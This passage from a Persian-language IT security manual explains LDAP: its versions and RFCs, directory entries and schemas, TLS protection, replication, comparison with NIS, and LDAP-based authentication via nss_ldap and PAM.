ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻜﺎﺭ ﺑﻨﺪﺩ.
Kerberosﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﺁﻥ ﺑﻪ ﻭﻓﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ،ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘـﺮ ﺍﻳﻨﻜـﻪ ﻣﺒـﺎﻧﻲ ﭘﺎﻳـﺔ ﺁﻥ
ﺑﺼﻮﺭﺕ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺴﺘﻘﻴﻢ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻴﺰ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ.
LDAP
ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ" ) ،(LDAPﻳﻚ ﻧﺴﺨﺔ ﻛﻢ ﺩﺭﺩﺳﺮ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ X.500ﺍﺳـﺖ ﻛـﻪ
ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ )ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ،ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﻧـﺎﻝ ﺍﻣـﻦ
ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﺩﻭ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﺯ LDAPﻭﺟﻮﺩ ﺩﺍﺭﺩ LDAPv2 .ﻛﻪ ﺳﺎﻝ ۱۹۹۵ﺩﺭ RFCﺷﻤﺎﺭﺓ ۱۷۷۷ﺗﻮﺻﻴﻒ ﺷﺪﻩ ،ﻣﮑﺎﻧﻴﺰﻡ
ﺍﻣﻨﻴﺘﻲ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻥ ﺩﺭ ﺗﻌﺎﻣـﻞ ﺑـﺎ Kerberosﺑﺎﺷـﺪ LDAPv3 .ﻛـﻪ ﺩﺭ
RFCﺷﻤﺎﺭﺓ ۲۲۵۱ﺗﻮﺻﻴﻒ ﺷﺪﻩ ﺍﺯ ١٨٠SASLﻫﻢ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ SASL .ﭼﻨﺪ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺭﻣﺰ ﻋﺒﻮﺭ )ﺍﺯ ﺟﻤﻠﻪ (!Kerberosﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﻫﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﺘﻦﺑﺎﺯ ﻭ ﭘﺮ ﺍﺳﺘﻔﺎﺩﺓ (OpenLDAP 2.x) LDAPv3ﻭ ﻫـﻢ
ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﺠﺎﺭﻱ ) Active Directoryﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ،ﺩﺭ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺎ Windows 2000ﺁﻏﺎﺯ ﺷﺪ( ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ SSL/TLS
ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻛﻞ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ -ﺍﺯ ﺟﻤﻠﻪ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ -ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ.
LDAPﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ LDAPﺑـﺮﺍﻱ
ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ،ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ،ﻭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ ﺩﺭ ﻣـﻮﺭﺩ
LADPﺳﺨﻦ ﻣﻲﮔﻮﻳﻴﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﺎﻳﺔ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺷﻜﻞ ﺩﻫـﺪ ،ﻭ ﻧﻴـﺰ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺑﻄـﻮﺭ
ﻓﺰﺍﻳﻨﺪﻩﺍﻱ -ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ Windwosﻭ - Linuxﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩﻩ ﻛﺮﺩﻥ ﺍﻳﻦ ﺍﻫﺪﺍﻑ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﭘﺮﻭﺗﻜﻞ LDAP
ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﺑﻪ ﺷﻜﻞ ﻳﻚ ﺩﺭﺧﺖ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﻩ -ﻛﻪ ﻫﺮﻳﻚ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻃﺒﻘﺔ ﺍﺷـﻴﺎ ﻭ ﺷـﺎﻣﻞ ﺻـﻔﺎﺗﻲ
ﺑﺮﺍﻱ ﻣﻘﺎﺩﻳﺮ ﺧﻮﺩ ﻫﺴﺘﻨﺪ -ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﺪﻩ ﺍﺳﺖ .ﻫﺮ ﻗﻠﻢ ﺩﺍﺩﻩ ﺷﺎﻣﻞ ﻳﻚ ﺻﻔﺖ ﺑﻪ ﻧﺎﻡ ") "cnﻧﺎﻡ ﻣـﺸﺘﺮﻙ( ١٨١ﺍﺳﺖ ﻛـﻪ ﺁﻧـﺮﺍ ﺍﺯ ﺳـﺎﻳﺮ
ﺍﻗﻼﻡ ﺑﺎ ﭘﺪﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻫﻤﺎﻥ ﺩﺭﺧﺖ ﻣﺘﻤﺎﻳﺰ ﻣﻲﺳﺎﺯﺩ.
180 Simple Authentication and Security Layer, RFC 2222
181 Common Name
٣٤٣
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ،ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﻣﺘﻌﻠﻖ ﺑﻪ ﻃﺒﻘﻪ ﺷﻲﺀ " "posixAccountﺷﺎﻣﻞ ﺻﻔﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻡ ﻛﺎﻣﻞ ﻛﺎﺭﺑﺮ ) ،(cnﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﺑـﺮﺍﻱ
ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ) ،(uidﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮ ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﮔﺮﻭﻩ ) uidNumberﻭ ،(gidNumberﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ﺧﺎﻧـﻪ )،(homeDirectory
ﭘﻮﺳﺘﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ) (loginShellﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ.
ﺩﺭ ﺍﺻﻄﻼﺣﺎﺕ ،LDAPﻳﻚ ﺷﻤﺎ ١٨٢ﺑﻪ ﻣﻌﻨﺎﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﺍﺷﻴﺎ ١٨٣ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘـﻲ ﻭ ﺗﻌـﺎﺭﻳﻒ ﺻـﻔﺎﺕ ﺑـﻪ ﻫـﻢ
ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ .ﮔﻮﻧﺔ ﺷﻲﺀ posixAccountﺩﺭ ﺷﻤﺎﻱ ﺳﺮﻭﻳﺲ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ) (nis.schemaﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ.
LDAPﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ -ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﺓ LDAPﺗﻘﺎﺿـﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ LDAP
ﻣﻲﻓﺮﺳﺘﺪ ﻭ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻘﺎﺿﺎﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ،ﺍﻧﺠﺎﻡ ﺟﺴﺘﺠﻮ ،ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳـﻚ
ﻳﺎ ﺑﻴﺸﺘﺮ ﺻﻔﺎﺕ ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﺓ ﺧﺎﺹ ،ﻭ ﻳﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳﻚ ﺯﻳﺮ ﺩﺭﺧﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻔﺮﺳﺘﻨﺪ.
ﺟﺎﻣﻌﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺪﺭﻥ ) LDAPﻣﺜﻞ Active Directoryﻳـﺎ (OpenLDAP 2.xﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﻣﻬﻢ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺟﺎﻣﻌﻴـﺖ ﺩﺍﺩﻩ ﻭ
ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ:
ﺟﺎﻣﻌﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩ
١٨٤
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻣﻲﺗﻮﺍﻧﺪ ﺍﺗﺼﺎﻻﺕ ﺍﻳﻤﻦﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ TLSﺭﺍ ﺑﭙﺬﻳﺮﺩ ،ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻌـﺎﻣﻼﺕ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ -ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ TLS ،ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ،TLSﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ
ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ LDAPﺑﺎ ﺁﻥ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛـﻪ ﻣـﻲﺧﻮﺍﺳـﺘﻨﺪ
ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻧﺪ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ LDAPﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ TLSﺑﺨﻮﺍﻫﻨـﺪ ،ﺗـﺎ ﺗـﻀﻤﻴﻦ ﻛﻨﻨـﺪ ﻛـﻪ ﺗﻨﻬـﺎ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ﻣﺠﺎﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ queryﺑﻔﺮﺳﺘﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﻪ ﺭﻭﺯ ﻛﻨﻨﺪ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻡ ﻣﺨﺎﺯﻥ ﺩﺍﺩﺓ LDAPﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ ﺧـﺮﺍﺏ ﺷـﺪﻥ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ LDAPﺍﺯ ﺩﺳﺖ ﻧﺮﻭﺩ.
LDAPﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮ ﺑﺮﺍﻱ NISﻭ NIS+ﺍﺳﺖ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﺍﺯ ﻣﺰﺍﻳـﺎﻱ
ﺍﺻﻠﻲ LDAPﺗﻮﺍﻧﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻭﺟﻮﺩ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤـﻦﺷـﺪﻩ
ﺑﻮﺳﻴﻠﺔ TLSﺍﺳﺖ .ﺍﺷﻜﺎﻝ ﺍﺻـﻠﻲ LDAPﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩﺗـﺮ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻳـﻚ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﺳﺖ ،ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺳﺎﺩﻩﺳﺎﺯﻱ ﺭﺍﻫﺒﺮﻱ LDAPﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ.
182 Schema
183 Object Classes
184 End-to-End Encryption
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺗﻜﺜﻴﺮ
٣٤٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ LDAP
RFCﺷﻤﺎﺭﺓ ۲۳۰۷ﺷﻴﻮﻩﺍﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ LDAPﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﺗﻮﺻﻴﻒ ﻣﻲﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﺍﻳـﻦ RFCﻳـﻚ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ ،ﺍﻣﺎ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺁﻥ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ،ﻭ ﻳﻚ ﻃﺮﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ
) (nis.schemaﺩﺭ OpenDAP 2.xﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ .ﻃـﺮﺡ ﻳـﺎﺩ ﺷـﺪﻩ "ﮔﻮﻧـﻪﻫـﺎﻱ ﺍﺷـﻴﺎ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ
) posixAccountﻭ ،(shadowAccountﮔﺮﻭﻫﻬﺎ ) ،(posixGroupﺧﺪﻣﺎﺕ ) ،(ipServiceﭘﺮﻭﺗﻜﻠﻬﺎ ) ،(ipProtocolﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ) ،(oncRPSﻣﻴﺰﺑﺎﻧﻬﺎ ) ،(ipHostﺷﺒﻜﻪﻫﺎ ) ،(ipNetworksﮔﺮﻭﻩﻫـﺎﻱ ﺷـﺒﻜﻪﺍﻱ (nisObject ،nisMap ،nisNetgroup) NISﻭ ﺳـﺎﻳﺮ
ﻣﻮﺍﺭﺩ ﺭﺍ ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﻛﻨﺪ.
ﻫﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺑـﺎ LDAPﻣﺠـﺪﺩﹰﺍ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ؛ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﺸﺎﺑﻪ ﺭﻭﻧـﺪ
" "kerberizingﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ Kerberosﻻﺯﻡ ﺑﻮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻧﻈﻴـﺮ Microsoft Windowsﻛـﻪ
ﻫﻤﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ١٨٥ﻣﻨﺘﺸﺮﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩ ﻣﻲﻛﻨﺪ ﺳـﺎﺩﻩ ﺍﺳـﺖ -ﺍﻣـﺎ ﻫﻨـﻮﺯ ﻫـﻢ
ﺑﺎﺯﻧﻮﻳﺴﻲ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻻﺯﻡ ﺍﺳﺖ.
ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ Unixﭼﻨﺪﺍﻥ ﻛﺎﺭﺁ ﻧﻴﺴﺖ .ﺩﺭﻋﻮﺽ ﺩﻭ ﺭﻭﺵ ﺟﺎﻳﮕﺰﻳﻦ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩ ﻛـﻪ ﺑﻌﻨـﻮﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﻣﺘﻦﺑﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ PADL Softwareﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻭ ﺩﺭ ﺑﻴﺸﺘﺮ ﺗﻮﺯﻳﻌﻬﺎﻱ Linuxﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ .ﺭﻭﺵ ﺍﻭﻝ nss_ldap
ﺍﺳﺖ ﻛﻪ ﺗﻮﺍﺑﻊ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ) Cﻣﺜﻞ )( (getpwentcﺭﺍ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺼﻮﺭﺕ ﻧﺎﻣﺮﺋﻲ ﺍﺯ ﻳﻚ ﭘﺎﻳﮕﺎﻩ
ﺩﺍﺩﻩ LDAPﺑﺠﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺤﻠﻲ ،NIS ،ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻗﺒﻞ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺗﻮﺍﺑـﻊ ﺭﺍ ﺑـﺮﺍﻱ
١٨٧
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺨﺘﻠﻒ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻓﺎﻳﻞ ﺗﻌﻮﻳﺾ ﻧﺎﻡ ﺳﺮﻭﻳﺲ) ١٨٦ﻣﻌﻤﻮ ﹰﻻ (/etc/nsswitch.confﻣﺠﺎﺯ ﻣﻲﺩﺍﻧﺴﺘﻨﺪ.
ﺭﻭﺵ ﺩﻭﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼـﺎﺭﭼﻮﺏ PAMﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﺑﺤـﺚ ﻣـﻲﺷـﻮﺩ .ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ LDAPﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣـﺎﺟﻮﻝ ،PAM
